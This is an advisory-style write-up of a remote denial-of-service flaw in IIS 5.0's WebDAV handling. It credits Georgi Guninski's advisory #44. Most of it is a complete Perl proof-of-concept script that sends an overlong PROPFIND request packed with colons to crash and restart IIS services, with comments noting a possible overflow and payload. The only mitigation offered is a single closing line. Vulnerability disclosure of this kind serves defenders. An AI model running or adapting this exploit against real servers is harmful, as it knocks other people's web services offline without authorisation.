Vulnerability

    IIS

Affected

    IIS 5.0

Description

    Following is based on a Georgi Guninski security advisory #44.  It
    is possible  to remotely  restart all  IIS related  services using
    specially  crafted   request.    If  this   request  is   repeated
    continously this seriously affects IIS performance.

    Basically the  problem are  very long  but valid  propfind request
    containing lots of ":".

    Demonstration:

    #!/usr/bin/perl
    use IO::Socket;
    printf "Written by Georgi Guninski wait some time\n";
    $port = @ARGV[1];
    $host = @ARGV[0];
    
    sub vv()
    {
    $ll=$_[0];
    $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
    return;
    $over=":" x $ll ; # the ":" is the most important
    $ch=pack("C",65); # just to check whether potentail payload is possible - yes
    $tmp = $ch x 64;
    $over= $ch x 4 . $over . $tmp;
    $over1=":" x $ll; #not sure about this
    
    $xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
    $xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    $l=length($xml);
    $req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length:
    $l\n\n$xml\n\n";
    syswrite($socket,$req,length($req));
    print ".";
    $socket->read($res,200);
    print $res;
    close $socket;
    }
    
    
    do vv(59060);
    #this is overflow, repeat several times - 49060 seems the smallest #, may need to change
    sleep(1);
    do vv(59060);

Solution

    Disabling WebDav extensions  may help though  we do not  recommend
    using IIS on the Internet.